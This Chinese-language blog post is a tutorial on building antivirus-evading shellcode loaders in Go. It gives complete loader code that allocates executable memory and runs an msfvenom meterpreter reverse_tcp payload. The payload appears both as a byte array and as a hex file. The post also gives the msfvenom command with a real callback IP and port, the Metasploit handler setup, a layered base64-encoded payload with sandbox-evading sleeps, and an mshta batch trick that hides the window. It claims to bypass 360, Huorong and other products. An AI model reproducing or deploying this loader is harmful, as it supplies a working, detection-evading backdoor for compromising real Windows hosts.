现在很多内网环境中都安了各种各样的杀软,在做内网渗透时难免会四处碰壁。想到Go是一门较新的语言,免杀效果应该比较好,再加上现在网上主流的免杀都是c、c++、python一类的,涉及go的免杀较少,所以就想来做一个Go语言的免杀。
在攻击中,shellcode是一段用于利用软件漏洞的有效负载,shellcode是16进制的机器码,以其经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在寄存器eip溢出后,放入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。
我们在做免杀时需要想办法将shellcode成功加载进电脑内存中并执行而绕过杀软的检测。
Golang go1.16.6 windows/amd64
vscode 1.49
SublimeText
windows10
metasploit v6.0.53-dev-
先上代码:
package main
import (
"io/ioutil"
"os"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll") //调用kernel32.dll
ntdll = syscall.MustLoadDLL("ntdll.dll") //调用ntdll.dll
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") //使用kernel32.dll调用ViretualAlloc函数
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") //使用ntdll调用RtCopyMemory函数
shellcode_buf = []byte{
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x51, 0x48, 0x8b,
0x52, 0x20, 0x56, 0x4d, 0x31, 0xc9, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a,
0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x48, 0x8b, 0x52, 0x20, 0x41, 0x51, 0x8b, 0x42, 0x3c, 0x48,
0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b,
0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0x8b, 0x48, 0x18, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x4d,
0x31, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0x41, 0xc1, 0xc9,
0x0d, 0xac, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45,
0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b,
0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48,
0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9,
0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00,
0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5,
0x49, 0xbc, 0x02, 0x00, 0x0d, 0x05, 0x01, 0x75, 0x2f, 0xe7, 0x41, 0x54, 0x49, 0x89, 0xe4,
0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68,
0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a,
0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89,
0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5,
0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba,
0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5,
0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9,
0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5,
0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41,
0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41,
0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31,
0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8,
0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40,
0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5,
0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c,
0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41,
0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5,
} //msfvenom生成的shellcode
)
func checkErr(err error) {
if err != nil { //如果内存调用出现错误,可以报出
if err.Error() != "The operation completed successfully." { //如果调用dll系统发出警告,但是程序运行成功,则不进行警报
println(err.Error()) //报出具体错误
os.Exit(1)
}
}
}
func main() {
shellcode := shellcode_buf
//调用VirtualAlloc为shellcode申请一块内存
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
checkErr(err)
}
//调用RtlCopyMemory来将shellcode加载进内存当中
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
checkErr(err)
//syscall来运行shellcode
syscall.Syscall(addr, 0, 0, 0, 0)
}
具体的代码原理都在代码注释中注明。
这里的shellcode是使用msf生成的:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=1.117.47.231 lport=3333 -f c
再用SublimeText,ctrl+h替换掉引号,把\x改成0x即可。
msf上线操作如下:
msfconsole
use exploite/mulite/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run
成功上线
隐藏黑框可以在编译时使用命令:
go build -ldflags="-H windowsgui -w -s" ms.go
免杀效果
火绒:
金山毒霸:
迈克菲:
windowsdefender
360
查杀率较高,这里尝试一下分离免杀,将shellcode写入到文件中和加载器分离开,在加载器启动执行时再将shellcode从文件当中读取进来。
为了存储和读取时格式统一,这里将所有的shellcode统一以字符串的形式存储在1.txt中(即去除掉所有0x和,和空格回车),同样可以使用SublimeText,ctrl+h来进行替换,此处不再赘述。
在程序从1.txt中读取shellcode后,可以使用hex.DecodeString来将字符串转换为字节数组的形式存储。
test1.go
package main
import (
"encoding/hex"
"fmt"
"io/ioutil"
"os"
"reflect"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
func Read2333() string {
f, err := ioutil.ReadFile("1.txt") //1.txt为我们需要加载的shellcode文件,这里可以使用其他格式的文件来进行混淆
if err != nil {
fmt.Println("read fail", err)
}
return string(f)
}
func checkErr(err error) {
if err != nil {
if err.Error() != "The operation completed successfully." {
println(err.Error())
os.Exit(1)
}
}
}
func main() {
b := Read2333()
fmt.Println(b)
shellcode, err := hex.DecodeString(b)
if err != nil {
checkErr(err)
}
fmt.Println(shellcode)
fmt.Println(reflect.TypeOf(shellcode))
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
checkErr(err)
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), (uintptr)(len(shellcode)))
checkErr(err)
syscall.Syscall(addr, 0, 0, 0, 0)
}
1.txt
fc4883e4f0e8cc00000041514150524831d265488b5260488b521851488b5220564d31c9488b7250480fb74a4a4831c0ac3c617c022c2041c1c90d4101c1e2ed52488b522041518b423c4801d0668178180b020f85720000008b80880000004885c074674801d050448b40204901d08b4818e35648ffc94d31c9418b34884801d64831c041c1c90dac4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02000d0501752fe741544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a0a415e50504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd585c0740a49ffce75e5e8930000004883ec104889e24d31c96a0441584889f941ba02d9c85fffd583f8007e554883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd583f8007d2858415759680040000041586a005a41ba0b2f0f30ffd5575941ba756e4d61ffd549ffcee93cffffff4801c34829c64885f675b441ffe7586a005949c7c2f0b5a256ffd5
修改之后的vt查杀率:
微步沙箱:
还是有些高。
具体代码如下:
package main
import (
"encoding/base64"
"encoding/hex"
"flag"
"fmt"
"io/ioutil"
"os"
"syscall"
"time"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
ke = syscall.MustLoadDLL("kernel32.dll")
nt = syscall.MustLoadDLL("ntdll.dll")
vac = ke.MustFindProc("VirtualAlloc")
rt = nt.MustFindProc("RtlCopyMemory")
)
func checkErr(err error) {
if err != nil {
if err.Error() != "The operation completed successfully." {
println(err.Error())
os.Exit(1)
}
}
}
func Read2333() string {
f, err := ioutil.ReadFile("1.ico")
if err != nil {
fmt.Println("read fail", err)
}
return string(f)
}
func Base64DecodeString(str string) string {
resBytes, _ := base64.StdEncoding.DecodeString(str)
return string(resBytes)
}
var ms string
func main() {
ms1 := flag.String("b", "tcp", "scan method")
flag.Parse()
fmt.Println(*ms1)
ms = *ms1
if ms == "udp" {
var c string = "qweqwdsfqweqwqwswqqweqdqwdqwdwqeqrwqeqwQWRQW/.OPKDIJGIJWDOIAOSJIRGJOEKDOQIWOIJOGWEMPOSDPOOPGKWE[LWEPQKPOKEORKOPKPROKPOKOPQWKEPQOGOIMEKOMDMQWPODPOKOK3-021-04-34-3204O-02I059032JR0JI@JI3J3E02e"
addr1, _, err := vac.Call(0, uintptr(len(c)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
_, _, err = rt.Call(addr1, (uintptr)(unsafe.Pointer(&c)), uintptr(len(c)/2))
time.Sleep(time.Second * 3)
var b string = Read2333()
deStrBytes := Base64DecodeString(b)
for i := 0; i < 5; i++ {
deStrBytes = Base64DecodeString(deStrBytes)
}
sc, err := hex.DecodeString(deStrBytes)
time.Sleep(time.Second * 3)
addr, _, err := vac.Call(0, uintptr(len(sc)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
time.Sleep(time.Second * 1)
if addr == 0 {
checkErr(err)
}
_, _, err = rt.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)/2))
time.Sleep(time.Second * 2)
_, _, err = rt.Call(addr+uintptr(len(sc)/2), (uintptr)(unsafe.Pointer(&sc[len(sc)/2])), uintptr(len(sc)/2))
time.Sleep(time.Second * 2)
checkErr(err)
time.Sleep(time.Second * 3)
syscall.Syscall(addr, 0, 0, 0, 0)
} else {
fmt.Println("Hello,world!")
}
}
1.ico
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释
* Vm10a01GVXlTblJXYmtwT1ZtMW9WbFpyV21GVlJsWnlXa2R3VGxKc1NsaFhhMXBoVkRGYWRHUjZTbFpXZWtJMFYxWmtTMVl5VGtsVmJHaHBWa1ZhYUZaR1ZsWk9Wa3BZVW10b2ExSlVWbFJWYlhoM1pXeFplVTFJYUZwV01IQllXVEJvVTFkSFNsVlNiV2hhVmpOb1IxUlZXbXRYUlRGV1pFZG9WMVpHV2tkWFYzUnJUa1pzVjFkcmFGVlhTRUpaV1ZSR1MxbFdVbGhqTTJoVFZqQldObGRyV25kVWJVcEhZMGhvVjFJelVsUlpiVEZYWTJzeFYxWnNaRmRTYTNCUVYxWmplRlJ0VVhoVldHUldZVE5TYjFSV2FFTmxSbXhXV1ROb1dsWXdjRmhaTUdoVFYwZEtWVkp0YUZwaE1WWTBXa1ZhYTFaV1JuSlBWazVUVFcxb05WWnJZM2hrTVdSeVRWVmFVRlpzV205YVYzaGhWVVpzYzFkc1pFOVNiVkphV1RCV1QyRldTblJrUkZaV1RWWktSRlpWV2xwbFJtUjBUMVpXYVZkRlNrMVhWbVI2WlVkT1YySkVXbE5pUlVwWVZXMTRkMlZzV1hoWk0yaFdUV3R3V0ZsVVRuTlZNa3BWVW1zNVlWWXphRmhVYTFwU1pERldjbVJIYkZOV1IzaEhWbFJHVTFJeGJGZFhhMmhvVTBWYVdWbHNVa2RVTVhCV1ZsUkdXRkpyTlZaVmJYTTFZVWRLUjFkVVJsZE5ibWhVV1cweFYxWnJOVmRoUm1ScFYwVkthRlpHWkRSV01EVlhXa2hLVm1KVlduQlZiRkp6VTFaYVNFMVhPVlZpVlhCWFZGVm9hMVpXWkVsUmJFNVZWbFpWZUZreFduZFRSMDVHVDFkc1YxWkdXalpXYWtaaFlURktjazFWWkdoTk1uaFVXV3hTUjFWR1ZuSldiR1JQWWtkU2VWWlhkREJoUjBZMlVteGFXbFpYVW5aV1J6RkhaRVpyZW1KR1ZsZFdhM0JJVmtaa2VrMVdTbGRVYkZaVFlYcFdjRlpzVWxka2JGbDVaRVpPYUdGNlJsZFViRnBYV1ZaSmVtRkhSbGRoTVZWNFdURmFVMlJIVGtoa1IyaG9aVzE0U2xadE1IaE9SbEp6VTJ0YVdHSnJOVlpaYkZKSFZURlNXR042Um10U2JFcGFXV3RrUjJGSFNrWldhbFpYVWpOU1ZGbHRjM2hXTWs1R1ZteG9WMUpVVm05WFZtUTBaREpKZUZWc2FFNVdWMUp3Vm14U1UwNVdXa2hOV0U1VlRXdGFlbGt3YUZOV1ZURklWV3hPVldKR1ZYaFZNRnBMWkVkT1IxRnNaRk5pU0VJMlZtdGtORlV5Um5SV2JHUnFVbXhhVmxaclZURlpWbXhZWkVWMGFsWnRVbnBYYTFVMVlVWmFWVlpyV2xaaVJrcElWa1JLUjJSR1ZuVlZiRlpwVW10d2FGWkdaSHBsUmtwWVVsaHdZVkp1UWs5WlZFWlhUVEZhUjJGSVpGTmhla1pZV1RCYVYyRkZNSHBSYXpsWFlXdEtXRlJzV210ak1WWnlVMnM1VTJKclNrcFdhMk40WWpGV1IxTnJXazlYUmtwWldWUktVMWRHYkZoamVrWlBZa1UxTUZwRlpFZFdNREZXVm1wT1YxSnNjRlJWYlhONFVqSktSMVpzWkdsV00yaFJWbTEwWVZNeVRYaFZiRnBXWWtWd2MxWnRNVFJsUmxWNVRWUlNXbFl3V25wWk1HaEhWbGRLU0ZWcmFGcFdSVVl6V2xaYWEyUkhSa2RqUm1SVFltdEpkMVpyV205a01WcHlUVmhLVDFOSGVGZFpiRkpIVlVaV2NsWnRSbXBpUjFKNVZsY3hNR0ZGTVZsUmExcFhUV3BGZDFaRVNrdFdiVTVKVTJ4V1YwMHdTbmxYVm1SNlRsWk9SMVZzVmxOaVZWcFlWV3hhV2sxR1drVlJiWFJXVFd0d1dGa3dXbGRYUjBwWVpVZEdZVll6YUdoWmVrWnJZekZXZFZOck5VNVNSM2hYVmxjd2VFMUdiRmhTYmxKYVpXdGFXVmxVU2xOVFJteFhWbFJHVjFZd1dUSlZNakZIVmpGS2NtTklhRmRTYldnelZtMHhWMk15VGtaaFJsWllVakpvVVZaWGRHRmtNazVIV2toU2FsSlVWbEJXYlRWRFYxWmFWMVZyVGxaU2JIQkhXVmh3UTFkR1duTlRiR2hhVm14VmVGWnNXbGRrUjFaSFVXeE9VMVpzYTNsV2FrWlRVekZaZVZKWVpFNVdWbHBZVm10V1MxVkdWbkZSYkZwT1VteEtWbFV5TVVkaFJURlpVV3hzVjAxcVJucFdSekZYWXpGS1dXSkdWbWhoTTBKVVZrZDRWazFXVGtkV2JGWlVZWHBzVDFsVVNqTmxiRnBIVjJ4T1dsWXdXa2haTUdoSFdWWkplbEZ0UmxwV00yaDVXa1JHVW1ReFZuTlhhelZUWWxob1dsWnNZM2hPUm1SeVRWaEtUbFpGTlZsV2JuQkhWakZ3VjFaVVJrOWlSVFZXVmtkek5WWXhTbGRXYWs1WFRXNVNjbFV5YzNoV01rNUpVbXhrYVZkRlNsRldWM0JEV1ZkU1IxcElVazVXYkhCUVZXMHhORlpzVlhoVmJHUlZUVlZzTkZVeU5VTlhSMHBIVTJ4U1dsWnNWWGRhVmxwaFpFZEtTRkp0YUdobGJGbzBWbXRhVTFNeFpISk5WbHBPVmtad1YxWnJWa3RWUm14WVRWWk9hVTFXU2pCWk1HUjNWR3N4V0dWR2JGZFNiRXBVVmtjeFIyUkhUalpTYkdocFYwVkthRlpHV2xabFJtUkhVMnhXVTJGNlZsUlVWVnAzWld4YVJWSnNUbXBoZWtaSFZHeFdiMWRHWkVsUmJFWlhZVEZWZUZscVJsTldWazV6V2tkc1UySllVVEZXVkVaVFVURnNWMU5ZYUdwVFJVcFdWbTE0UzFReFVsWlhibVJZVW0xU01GcFZaRWRoUjBwR1ZtcE9WMUo2UWpSV1YzTjRWbXM1Vmxac1ZtbFhSMmh2Vm0xMFlXTnRWbk5hU0VwV1lraENUMWxZY0ZkU2JGWlhWV3hPVlUxV2NFZFZiRkpIVjBkS1ZWSnNUbUZXYkZZMFdrVmFZVlpXU25KUFZUVnBVbFpaTVZacldtcGxSbFY1VW14YVRsWlhhRmRXYTFwaFZWWmFjbHBFVW1wU2JFb3hXVEJvVDJGR1NsVldibWhXVFZaS1dGWkhNVXRXTWtZMlVXeFdWMVl4U2xoV1IzUmhZekZhVjFKc2JHcFNNRnBVVlcwMVEwMUdXWGhYYkU1YVZqQmFlVlJzVW1GV1IwcFlZVVpDVlZZemFGaFViRnByVmpGd1IxcEhhRmRXUmxwS1ZsUkdVMUV4WkhSVGJGcFlZbXRLV1Zsc2FFTlZNVkp5VjI1T1QySkhVbHBaVlZVeFZUQXhWbU5JY0ZkTmJsSnlWVEp6ZUZKck9WZGhSbVJwVmpOb2IxWnRkRlpOVjA1WFdraEtZVkpVVm5OV2JGSkhVbXhzVmxwSVpGWlNhM0JKVmxjMVExWlhSWGhUYlVaaFZsWldORlJ0ZUU5WFYwWkdUMWQ0YVZORlNqUldhMlF3VlRKS2NrMVdXazVYUmtwVldXeG9RMkZHV25KWGEzUnFZa1pLVmxVeWVFdFViVXBJWlVob1YxWnRhSHBXTWpGSFkyc3hSVkZzYUZkU1dFSlJWMVpXVmsxV1NsZFdibEpwVWxSc1dGUldXbmRrYkZsNVRVaG9XR0Y2UmtoWmExcFhWbXhhUmxOck9WZGhhMXA2VkcxNFUxZEZNVlpQVjJ4WFlsaGplVlpYZUZOVU1WSjBVbTVPYVZKR2NGbFdhMVozVmtac1dHVklaRmRXYkVwYVYydFZNV0pIUmpaU1ZFcFhVak5vVkZaWGMzaGphekZYVm14V1dGSXphRkJYYkdRMFdWZE5lRnBJVWs1V1ZHeHdWV3hTVjJWR1dYbE5TR2hZWVhwR2VsbFVUbTlYUm1SSlVXMW9XbFpXY0hwYVJWcHJWbFpHYzFGc1RsTmhNVmw2Vm10YVlWVXlTbkpOVmxwT1ZteGFXRmxzVWtkVlJscHlWbTVLYTAxV1NuaFZNbmhyWVVVeFJXSkZXbFppUjJoNlZrUktSMlJIUmtsVmJGWllVMFZLVUZaSGVGWmxSVFZ6VTJ4V1UySlZXbGhWYWs1U1RXeGFTRTVZWkdoaVZscFlXVEJvVTFkR1drWmpSMFpoVmpOU2VWUldXbEpsUmxaelYyMTRVMVpHVlhsV2FrWlRWREZSZUZOcmFGWmlhM0JXV1d4b1ExbFdjRVZSVkZaWFZteGFWbFZYY3pWaFZscDBaRVJTVjFKRlNsUlpha3BMVWpKS1IyRkdhR2xXUlZwUlZsZDBhMkZ0VVhoVmJrcFdZa1Z3YzFscmFFTlNiRlY0Vld0a1dsWnJiRFJXYkZKSFYwWmFkRlZyWkZWV00wNDBXVEZhWVZkWFNraFNiR1JUVFd4R05sWnFTWGhrTVZsNVVtdGthbEpXV2xOWmJHaHZWVlphY1ZGWWFFOWlSMUo2VjJ0V2QxUnNXbFZTVkVwYVlUSk9ORlpFU2t0V01VcFZVbXhXYVZaRldtaFdSbFpoWXpBMWRGTnJhR3hTYTBwWVZXcE9VazFXV2tWUmJFNVVUV3R3UjFReFZtOVZNa3BaVVd4R1ZtRnJSWGhaTVZwcll6RndSbGR0ZUZOV1JsVjVWbGQ0YjJJeFVuTlhhMmhWWVd4YVZsbHNhRU5WTVZKeVZsUkdWMVpzY0ZaV1YzTTFWVEF4U0dSRVRsZFNSVXB5Vm1wS1MxSnJOVlZYYlVaVFRURktVRmRXWTNoVWJWWkhWV3hrVm1KRmNFOVZiRkpYWlVaYWMxVnJUbFZOYTNCWVZXeG9jMWRIUlhoVGJXaGFWbXhWZUZWc1drOVdWbEp6WTBkb2FHVnJTVEJXYTJRd1ZURldjazVWWkdwU2JGcGhXbGR6TVZsV2JGaGtSbHBPVW0xU1dGWlhNREZpUmxwMVVXeGFXR0ZyTlhKV01uTjRZekpPU0U5V1ZtbFNhM0JSVjFaU1FrMVdXbGhUYTJob1VtNUNXRlZ0ZEhkbFJsbDRWMjEwV0dGNlJrZFVWbFpYV1ZkV2NsZHJPVmRoYTBWNFdrVmFhMWRYVGtaWGF6Vk9Va1ZKTVZac1dtOWtNVkY0VjFob1dHSnNTbGxaYkdoRFVURlNWbGR1WkZOV2JIQldWVEo0ZDJGSFNraGtSRTVYVW5wV00xVjZTa3RXYXpGWlVteFNWMUpzY0ZKV2JYQkhVekpPVjFWWVpHRlNia0p6Vld4U1YxTldWWGhWYTA1YVZteHdSMVJzYUVkWFIwcFpVV3QwVlZac1ZqUlpNVnB6VG14S2RGSnNaRk5pUmxrd1ZtdFNRMVV4VlhsU2JGcFBWbGRvVjFsc2FHOWhSbHB5V2tVMWJHSkhVbmxXVjNSM1ZHc3hSVlpzV2xaaVJrcE1Wa1JLUzFZeFpIVlNiR2hwVWpGS1dWZFdVa2RrTWs1WFYyNVNhMUpVYkhOWmEyUXdUVEZhUlZKc1RsSmhla1o1VkZWb2MxWldaRWhoUlRsaFZqTm9lbFJyV210WFYwNUpWRzFvVjJKclNsZFdhMk40WkRGc1YxTllaRTVUU0VKWlZqQm9RMWxXY0ZkWGJrNVhWbXR3TUZwRlZUVldNVXAwWkhwQ1YxSnRhRE5WTWpGWFkyczFWbFp0YUd4aVJuQm9WMnhqZUZVeVRYaFZiazVoVW10d2NsUlZVbGRUVmxWNFZXdDBWV0pHY0VkV2JGSkRWbFprU1ZGc1pGVldNMDEzV2xaYVUyUkhSa1pQVms1VFlUTkNORlpyWkRSVk1rWjBWbXhrYWxKV1dsbFdhMVozVkRGc1dFMVhPV3BTYkVwWVZsZHpOV0ZHV25WUmExcFhWbnBGZDFaSGVHRlNhekZKWVVaV1YxSllRbEJXUm1SNlRsWk9SMVpzVmxWaVZWcFVWV3hTVjAxR1draGtSazVTVFd0YWVsbHJhRWRXUjBwWllVWkNWbUV4Y0VoVWJGcHJWMGRPUjFOck5WZFdSVmwzVmxSR1UxWXhWa2RYV0doVVltdGFWbFpzWkZOVlJteHlWMjVPVGsxVlNsWlVWVkYzVUZFOVBRPT0=
*/
可以成功上线
如果想隐藏黑窗口的话可以调用win32的windowsapi,但是免杀效果不太好,所以这里去除黑框可以编写bat实现。使用bat调用exe的同时隐藏dos黑框:
1.bat
@echo off
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
REM
asd666.exe -b udp
成功上线
vt上传看看:
已经基本达到了预期免杀效果,国内的安全管家、360、火绒等均可以完美绕过。